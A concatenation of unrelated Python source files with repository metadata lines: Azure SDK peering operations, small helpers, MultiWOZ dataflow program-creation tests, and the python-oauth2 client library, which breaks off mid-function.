:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualRouterPeeringListResult"]
"""Lists all Virtual Router Peerings in a Virtual Router resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterPeeringListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeeringListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeeringListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeeringListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings'} # type: ignore
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_virtual_router_peerings_operations.py | Python | mit | 22,524 |
from helper_sql import sqlExecute
def insert(t):
sqlExecute('''INSERT INTO sent VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)''', *t)
| bmng-dev/PyBitmessage | src/helper_sent.py | Python | mit | 132 |
from . import adaptVor_driver
from .adaptVor_driver import AdaptiveVoronoiDriver
| westpa/westpa | src/westext/adaptvoronoi/__init__.py | Python | mit | 82 |
import os
import sys
def main():
if len(sys.argv) != 2:
print("Usage: Pass the file name for the source transcript txt file.")
sys.exit(-1)
file = sys.argv[1]
out_file = os.path.expanduser(
os.path.join(
'~/Desktop',
os.path.basename(file)
)
)
print("Files:")
print("Reading source file: ", file)
print("Exported version at: ", out_file)
fin = open(file, 'r', encoding='utf-8')
fout = open(out_file, 'w', encoding='utf-8')
with fin, fout:
time = "0:00"
for line in fin:
if is_time(line):
time = get_time_text(line)
elif line and line.strip():
text = f"{time} {line.strip()}\n\n"
fout.write(text)
# print(text)
def is_time(line: str) -> bool:
if not line or not line.strip():
return False
parts = line.split(':')
if not parts:
return False
return all(p.strip().isnumeric() for p in parts)
def get_time_text(line: str) -> str:
if ':' not in line:
raise Exception(f"Text doesn't seem to be a time: {line}")
parts = line.split(':')
hour_text = "0"
min_text = "0"
sec_text = "0"
if len(parts) == 3:
hour_text = parts[0].strip()
min_text = parts[1].strip()
sec_text = parts[2].strip()
elif len(parts) == 2:
min_text = parts[0].strip()
sec_text = parts[1].strip()
elif len(parts) == 1:
sec_text = parts[0].strip()
return f"{hour_text.zfill(2)}:{min_text.zfill(2)}:{sec_text.zfill(2)}"
if __name__ == '__main__':
main()
| mikeckennedy/python_bytes_show_notes | tools/otter_ai_to_our_format.py | Python | mit | 1,657 |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
from typing import Any, Dict, Iterator, List
from dataflow.core.utterance_tokenizer import UtteranceTokenizer
from dataflow.multiwoz.create_programs import create_programs_for_trade_dialogue
from dataflow.multiwoz.salience_model import DummySalienceModel, VanillaSalienceModel
def load_test_trade_dialogues(data_dir: str) -> Iterator[Dict[str, Any]]:
"""Returns selected test dialogues.
To extract a dialogue from the TRADE processed json file:
$ jq '.[] | select (.dialogue_idx == "MUL1626.json")' dev_dials.json
"""
multiwoz_2_1_dir = os.path.join(data_dir, "multiwoz_2_1")
for dialogue_id in [
"MUL1626.json",
"PMUL3166.json",
"MUL2258.json",
"MUL2199.json",
"MUL2096.json",
"PMUL3470.json",
"PMUL4478.json",
]:
trade_dialogue_file = os.path.join(multiwoz_2_1_dir, dialogue_id)
trade_dialogue = json.load(open(trade_dialogue_file))
yield trade_dialogue
def test_create_programs_with_dummy_salience_model(data_dir: str):
"""Tests creating programs with a dummy salience model."""
utterance_tokenizer = UtteranceTokenizer()
salience_model = DummySalienceModel()
expected_num_refer_calls = {
"MUL1626.json": 0,
"PMUL3166.json": 0,
"MUL2258.json": 0,
"MUL2199.json": 0,
"MUL2096.json": 0,
"PMUL3470.json": 0,
"PMUL4478.json": 0,
}
for trade_dialogue in load_test_trade_dialogues(data_dir):
dataflow_dialogue, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
dialogue_id = dataflow_dialogue.dialogue_id
assert (
num_refer_calls == expected_num_refer_calls[dialogue_id]
), "{} failed".format(dialogue_id)
def test_create_programs_without_revise(data_dir: str):
"""Tests creating programs without revise calls.
It should not use refer calls even with a valid salience model.
"""
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
for trade_dialogue in load_test_trade_dialogues(data_dir):
for avoid_empty_plan in [True, False]:
_, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=True,
avoid_empty_plan=avoid_empty_plan,
utterance_tokenizer=utterance_tokenizer,
)
assert num_refer_calls == 0
def test_create_programs_with_vanilla_salience_model(data_dir: str):
"""Tests creating programs with a vanilla salience model.
"""
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_num_refer_calls = {
"MUL1626.json": 1,
"PMUL3166.json": 0,
"MUL2258.json": 1,
"MUL2199.json": 1,
"MUL2096.json": 0,
"PMUL3470.json": 0,
"PMUL4478.json": 0,
}
for trade_dialogue in load_test_trade_dialogues(data_dir):
dataflow_dialogue, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
dialogue_id = dataflow_dialogue.dialogue_id
assert (
num_refer_calls == expected_num_refer_calls[dialogue_id]
), "{} failed".format(dialogue_id)
def test_create_programs_with_revise(trade_dialogue_1: Dict[str, Any]):
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_plans: List[str] = [
# turn 1
"""(find (Constraint[Hotel] :name (?= "none") :type (?= "none")))""",
# turn 2
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "hilton") :pricerange (?= "cheap") :type (?= "guest house")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 3
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "none")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 4
"""(abandon (Constraint[Hotel]))""",
# turn 5
"""(find (Constraint[Hotel] :area (?= "west")))""",
# turn 6
"""(find (Constraint[Restaurant] :area (refer (Constraint[Area]))))""",
# turn 7
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 8
"()",
# turn 9
"""(find (Constraint[Taxi] :departure (?= "none")))""",
# turn 10
"()",
]
dataflow_dialogue, _, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue_1,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
for turn, expected_lispress in zip(dataflow_dialogue.turns, expected_plans):
lispress = turn.lispress
assert lispress == expected_lispress
def test_create_programs_with_revise_with_fill_none(trade_dialogue_1: Dict[str, Any]):
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_plans: List[str] = [
# turn 1
"""(find (Constraint[Hotel] :area (?= "none") :book-day (?= "none") :book-people (?= "none") :book-stay (?= "none") :internet (?= "none") :name (?= "none") :parking (?= "none") :pricerange (?= "none") :stars (?= "none") :type (?= "none")))""",
# turn 2
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "hilton") :pricerange (?= "cheap") :type (?= "guest house")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 3
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "none")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 4
"""(abandon (Constraint[Hotel]))""",
# turn 5
"""(find (Constraint[Hotel] :area (?= "west") :book-day (?= "none") :book-people (?= "none") :book-stay (?= "none") :internet (?= "none") :name (?= "none") :parking (?= "none") :pricerange (?= "none") :stars (?= "none") :type (?= "none")))""",
# turn 6
"""(find (Constraint[Restaurant] :area (refer (Constraint[Area])) :book-day (?= "none") :book-people (?= "none") :book-time (?= "none") :food (?= "none") :name (?= "none") :pricerange (?= "none")))""",
# turn 7
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 8
"()",
# turn 9
"""(find (Constraint[Taxi] :arriveby (?= "none") :departure (?= "none") :destination (?= "none") :leaveat (?= "none")))""",
# turn 10
"()",
]
dataflow_dialogue, _, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue_1,
keep_all_domains=True,
remove_none=False,
fill_none=True,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
for turn, expected_plan in zip(
dataflow_dialogue.turns, expected_plans # pylint: disable=no-member
):
lispress = turn.lispress
assert lispress == expected_plan
def test_create_programs_with_revise_with_avoid_empty_plan(
trade_dialogue_1: Dict[str, Any]
):
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_plans: List[str] = [
# turn 1
"""(find (Constraint[Hotel] :name (?= "none") :type (?= "none")))""",
# turn 2
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "hilton") :pricerange (?= "cheap") :type (?= "guest house")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 3
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "none")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 4
"""(abandon (Constraint[Hotel]))""",
# turn 5
"""(find (Constraint[Hotel] :area (?= "west")))""",
# turn 6
"""(find (Constraint[Restaurant] :area (refer (Constraint[Area]))))""",
# turn 7
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 8
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 9
"""(find (Constraint[Taxi] :departure (?= "none")))""",
# turn 10
"""(ReviseConstraint :new (Constraint[Taxi] :departure (?= "none")) :oldLocation (Constraint[Constraint[Taxi]]) :rootLocation (roleConstraint #(Path "output")))""",
]
dataflow_dialogue, _, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue_1,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=True,
utterance_tokenizer=utterance_tokenizer,
)
for turn_part, expected_plan in zip(dataflow_dialogue.turns, expected_plans):
lispress = turn_part.lispress
assert lispress == expected_plan
| microsoft/task_oriented_dialogue_as_dataflow_synthesis | tests/test_dataflow/multiwoz/test_create_programs.py | Python | mit | 10,600 |
"""
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import base64
import urllib
import time
import random
import urlparse
import hmac
import binascii
import httplib2
try:
from urlparse import parse_qs
parse_qs # placate pyflakes
except ImportError:
# fall back for Python 2.5
from cgi import parse_qs
try:
from hashlib import sha1
sha = sha1
except ImportError:
# hashlib was added in Python 2.5
import sha
import _version
__version__ = _version.__version__
OAUTH_VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
class Error(RuntimeError):
"""Generic exception class."""
def __init__(self, message='OAuth error occurred.'):
self._message = message
@property
def message(self):
"""A hack to get around the deprecation errors in 2.6."""
return self._message
def __str__(self):
return self._message
class MissingSignature(Error):
pass
def build_authenticate_header(realm=''):
"""Optional WWW-Authenticate header (401 error)"""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def build_xoauth_string(url, consumer, token=None):
"""Build an XOAUTH string for use in SMTP/IMPA authentication."""
request = Request.from_consumer_and_token(consumer, token,
"GET", url)
signing_method = SignatureMethod_HMAC_SHA1()
request.sign_request(signing_method, consumer, token)
params = []
for k, v in sorted(request.iteritems()):
if v is not None:
params.append('%s="%s"' % (k, escape(v)))
return "%s %s %s" % ("GET", url, ','.join(params))
def to_unicode(s):
""" Convert to unicode, raise exception with instructive error
message if s is not unicode, ascii, or utf-8. """
if not isinstance(s, unicode):
if not isinstance(s, str):
raise TypeError('You are required to pass either unicode or string here, not: %r (%s)' % (type(s), s))
try:
s = s.decode('utf-8')
except UnicodeDecodeError, le:
raise TypeError('You are required to pass either a unicode object or a utf-8 string here. You passed a Python string object which contained non-utf-8: %r. The UnicodeDecodeError that resulted from attempting to interpret it as utf-8 was: %s' % (s, le,))
return s
def to_utf8(s):
return to_unicode(s).encode('utf-8')
def to_unicode_if_string(s):
if isinstance(s, basestring):
return to_unicode(s)
else:
return s
def to_utf8_if_string(s):
if isinstance(s, basestring):
return to_utf8(s)
else:
return s
def to_unicode_optional_iterator(x):
"""
Raise TypeError if x is a str containing non-utf8 bytes or if x is
an iterable which contains such a str.
"""
if isinstance(x, basestring):
return to_unicode(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_unicode(e) for e in l ]
def to_utf8_optional_iterator(x):
"""
Raise TypeError if x is a str or if x is an iterable which
contains a str.
"""
if isinstance(x, basestring):
return to_utf8(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_utf8_if_string(e) for e in l ]
def escape(s):
"""Escape a URL including any /."""
return urllib.quote(s.encode('utf-8'), safe='~')
def generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def generate_nonce(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def generate_verifier(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
class Consumer(object):
"""A consumer of OAuth-protected services.
The OAuth consumer is a "third-party" service that wants to access
protected resources from an OAuth service provider on behalf of an end
user. It's kind of the OAuth client.
Usually a consumer must be registered with the service provider by the
developer of the consumer software. As part of that process, the service
provider gives the consumer a *key* and a *secret* with which the consumer
software can identify itself to the service. The consumer will include its
key in each request to identify itself, but will use its secret only when
signing requests, to prove that the request is from that particular
registered consumer.
Once registered, the consumer can then use its consumer credentials to ask
the service provider for a request token, kicking off the OAuth
authorization process.
"""
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def __str__(self):
data = {'oauth_consumer_key': self.key,
'oauth_consumer_secret': self.secret}
return urllib.urlencode(data)
class Token(object):
"""An OAuth credential used to request authorization or a protected
resource.
Tokens in OAuth comprise a *key* and a *secret*. The key is included in
requests to identify the token being used, but the secret is used only in
the signature, to prove that the requester is who the server gave the
token to.
When first negotiating the authorization, the consumer asks for a *request
token* that the live user authorizes with the service provider. The
consumer then exchanges the request token for an *access token* that can
be used to access protected resources.
"""
key = None
secret = None
callback = None
callback_confirmed = None
verifier = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def set_callback(self, callback):
self.callback = callback
self.callback_confirmed = 'true'
def set_verifier(self, verifier=None):
if verifier is not None:
self.verifier = verifier
else:
self.verifier = generate_verifier()
def get_callback_url(self):
if self.callback and self.verifier:
# Append the oauth_verifier.
parts = urlparse.urlparse(self.callback)
scheme, netloc, path, params, query, fragment = parts[:6]
if query:
query = '%s&oauth_verifier=%s' % (query, self.verifier)
else:
query = 'oauth_verifier=%s' % self.verifier
return urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
return self.callback
def to_string(self):
"""Returns this token as a plain string, suitable for storage.
The resulting string includes the token's secret, so you should never
send or store this string where a third party can read it.
"""
data = {
'oauth_token': self.key,
'oauth_token_secret': self.secret,
}
if self.callback_confirmed is not None:
data['oauth_callback_confirmed'] = self.callback_confirmed
return urllib.urlencode(data)
@staticmethod
def from_string(s):
"""Deserializes a token from a string like one returned by
`to_string()`."""
if not len(s):
raise ValueError("Invalid parameter string.")
params = parse_qs(s, keep_blank_values=False)
if not len(params):
raise ValueError("Invalid parameter string.")
try:
key = params['oauth_token'][0]
except Exception:
raise ValueError("'oauth_token' not found in OAuth request.")
try:
secret = params['oauth_token_secret'][0]
except Exception:
raise ValueError("'oauth_token_secret' not found in "
"OAuth request.")
token = Token(key, secret)
try:
token.callback_confirmed = params['oauth_callback_confirmed'][0]
except KeyError:
pass # 1.0, no callback confirmed.
return token
def __str__(self):
return self.to_string()
def setter(attr):
name = attr.__name__
def getter(self):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
def deleter(self):
del self.__dict__[name]
return property(getter, attr, deleter)
class Request(dict):
"""The parameters and information for an HTTP request, suitable for
authorizing with OAuth credentials.
When a consumer wants to access a service's protected resources, it does
so using a signed HTTP request identifying itself (the consumer) with its
key, and providing an access token authorized by the end user to access
those resources.
"""
version = OAUTH_VERSION
def __init__(self, method=HTTP_METHOD, url=None, parameters=None,
body='', is_form_encoded=False):
if url is not None:
self.url = to_unicode(url)
self.method = method
if parameters is not None:
for k, v in parameters.iteritems():
k = to_unicode(k)
v = to_unicode_optional_iterator(v)
self[k] = v
self.body = body
self.is_form_encoded = is_form_encoded
@setter
def url(self, value):
self.__dict__['url'] = value
if value is not None:
scheme, netloc, path, params, query, fragment = urlparse.urlparse(value)
# Exclude default port numbers.
if scheme == 'http' and netloc[-3:] == ':80':
netloc = netloc[:-3]
elif scheme == 'https' and netloc[-4:] == ':443':
netloc = netloc[:-4]
if scheme not in ('http', 'https'):
raise ValueError("Unsupported URL %s (%s)." % (value, scheme))
# Normalized URL excludes params, query, and fragment.
self.normalized_url = urlparse.urlunparse((scheme, netloc, path, None, None, None))
else:
self.normalized_url = None
self.__dict__['url'] = None
@setter
def method(self, value):
self.__dict__['method'] = value.upper()
def _get_timestamp_nonce(self):
return self['oauth_timestamp'], self['oauth_nonce']
def get_nonoauth_parameters(self):
"""Get any non-OAuth parameters."""
return dict([(k, v) for k, v in self.iteritems()
if not k.startswith('oauth_')])
def to_header(self, realm=''):
"""Serialize as a header for an HTTPAuth request."""
oauth_params = ((k, v) for k, v in self.items()
if k.startswith('oauth_'))
stringy_params = ((k, escape(str(v))) for k, v in oauth_params)
header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
params_header = ', '.join(header_params)
auth_header = 'OAuth realm="%s"' % realm
if params_header:
auth_header = "%s, %s" % (auth_header, params_header)
return {'Authorization': auth_header}
def to_postdata(self):
"""Serialize as post data for a POST request."""
d = {}
for k, v in self.iteritems():
d[k.encode('utf-8')] = to_utf8_optional_iterator(v)
# tell urlencode to deal with sequence values and map them correctly
# to resulting querystring. for example self["k"] = ["v1", "v2"] will
# result in 'k=v1&k=v2' and not k=%5B%27v1%27%2C+%27v2%27%5D
return urllib.urlencode(d, True).replace('+', '%20')
def to_url(self):
"""Serialize as a URL for a GET request."""
base_url = urlparse.urlparse(self.url)
try:
query = base_url.query
except AttributeError:
# must be python <2.5
query = base_url[4]
query = parse_qs(query)
for k, v in self.items():
query.setdefault(k, []).append(v)
try:
scheme = base_url.scheme
netloc = base_url.netloc
path = base_url.path
params = base_url.params
fragment = base_url.fragment
except AttributeError:
# must be python <2.5
scheme = base_url[0]
netloc = base_url[1]
path = base_url[2]
params = base_url[3]
fragment = base_url[5]
url = (scheme, netloc, path, params,
urllib.urlencode(query, True), fragment)
return urlparse.urlunparse(url)
def get_parameter(self, parameter):
ret = self.get(parameter)
if ret is None:
raise Error('Parameter not found: %s' % parameter)
return ret
def get_normalized_parameters(self):
"""Return a string that contains the parameters that must be signed."""
items = []
for key, value in self.iteritems():
if key == 'oauth_signature':
continue
# 1.0a/9.1.1 states that kvp must be sorted by key, then by value,
# so we unpack sequence values into multiple items for sorting.
if isinstance(value, basestring):
items.append((to_utf8_if_string(key), to_utf8(value)))
else:
try:
value = list(value)
except TypeError, e:
assert 'is not iterable' in str(e)
items.append((to_utf8_if_string(key), to_utf8_if_string(value)))
else:
items.extend((to_utf8_if_string(key), to_utf8_if_string(item)) for item in value)
# Include any query string parameters from the provided URL
query = urlparse.urlparse(self.url)[4]
url_items = self._split_url_string(query).items()
url_items = [(to_utf8(k), to_utf8(v)) for k, v in url_items if k != 'oauth_signature' ]
items.extend(url_items)
items.sort()
encoded_str = urllib.urlencode(items)
# Encode signature parameters per Oauth Core 1.0 protocol
# spec draft 7, section 3.6
# (http://tools.ietf.org/html/draft-hammer-oauth-07#section-3.6)
# Spaces must be encoded with "%20" instead of "+"
return encoded_str.replace('+', '%20').replace('%7E', '~')
def sign_request(self, signature_method, consumer, token):
"""Set the signature parameter to the result of sign."""
if not self.is_form_encoded:
# according to
# http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html
# section 4.1.1 "OAuth Consumers MUST NOT include an
# oauth_body_hash parameter on requests with form-encoded
# request bodies."
self['oauth_body_hash'] = base64.b64encode(sha(self.body).digest())
if 'oauth_consumer_key' not in self:
self['oauth_consumer_key'] = consumer.key
if token and 'oauth_token' not in self:
self['oauth_token'] = token.key
self['oauth_signature_method'] = signature_method.name
self['oauth_signature'] = signature_method.sign(self, consumer, token)
@classmethod
def make_timestamp(cls):
"""Get seconds since epoch (UTC)."""
return str(int(time.time()))
@classmethod
def make_nonce(cls):
"""Generate pseudorandom number."""
return str(random.randint(0, 100000000))
@classmethod
def from_request(cls, http_method, http_url, headers=None, parameters=None,
query_string=None):
"""Combines multiple parameter sources."""
if parameters is None:
parameters = {}
# Headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# Check that the authorization header is OAuth.
if auth_header[:6] == 'OAuth ':
auth_header = auth_header[6:]
try:
# Get the parameters from the header.
header_params = cls._split_header(auth_header)
parameters.update(header_params)
except:
raise Error('Unable to parse OAuth parameters from '
'Authorization header.')
# GET or POST query string.
if query_string:
query_params = cls._split_url_string(query_string)
parameters.update(query_params)
# URL parameters.
param_str = urlparse.urlparse(http_url)[4] # query
url_params = cls._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return cls(http_method, http_url, parameters)
return None
@classmethod
def from_consumer_and_token(cls, consumer, token=None,
http_method=HTTP_METHOD, http_url=None, parameters=None,
body='', is_form_encoded=False):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': consumer.key,
'oauth_timestamp': cls.make_timestamp(),
'oauth_nonce': cls.make_nonce(),
'oauth_version': cls.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
if token.verifier:
parameters['oauth_verifier'] = token.verifier
return Request(http_method, http_url, parameters, body=body,
is_form_encoded=is_form_encoded)
@classmethod
def from_token_and_callback(cls, token, callback=None,
http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return cls(http_method, http_url, parameters)
@staticmethod
def _split_header(header):
"""Turn Authorization: header into parameters."""
params = {}
parts = header.split(',')
for param in parts:
# Ignore realm parameter.
if param.find('realm') > -1:
continue
# Remove whitespace.
param = param.strip()
# Split key-value.
param_parts = param.split('=', 1)
# Remove quotes and unescape the value.
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
@staticmethod
def _split_url_string(param_str):
"""Turn URL string into parameters."""
parameters = parse_qs(param_str.encode('utf-8'), keep_blank_values=True)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
class Client(httplib2.Http):
"""OAuthClient is a worker to attempt to execute a request."""
def __init__(self, consumer, token=None, cache=None, timeout=None,
proxy_info=None):
if consumer is not None and not isinstance(consumer, Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, Token):
raise ValueError("Invalid token.")
self.consumer = consumer
self.token = token
self.method = SignatureMethod_HMAC_SHA1()
httplib2.Http.__init__(self, cache=cache, timeout=timeout, proxy_info=proxy_info)
def set_signature_method(self, method):
if not isinstance(method, SignatureMethod):
raise ValueError("Invalid signature method.")
self.method = method
def request(self, uri, method="GET", body='', headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS, connection_type=None):
DEFAULT_POST_CONTENT_TYPE = 'application/x-www-form-urlencoded'
if not isinstance(headers, dict):
headers = {}
if method == "POST":
headers['Content-Type'] = headers.get('Content-Type',
DEFAULT_POST_CONTENT_TYPE)
is_form_encoded = \
headers.get('Content-Type') == 'application/x-www-form-urlencoded'
if is_form_encoded and body:
parameters = dict([(k,v[0]) for k,v in parse_qs(body).items()])
else:
parameters = None
req = Request.from_consumer_and_token(self.consumer,
token=self.token, http_method=method, http_url=uri,
parameters=parameters, body=body, is_form_encoded=is_form_encoded)
req.sign_request(self.method, self.consumer, self.token)
schema, rest = urllib.splittype(uri)
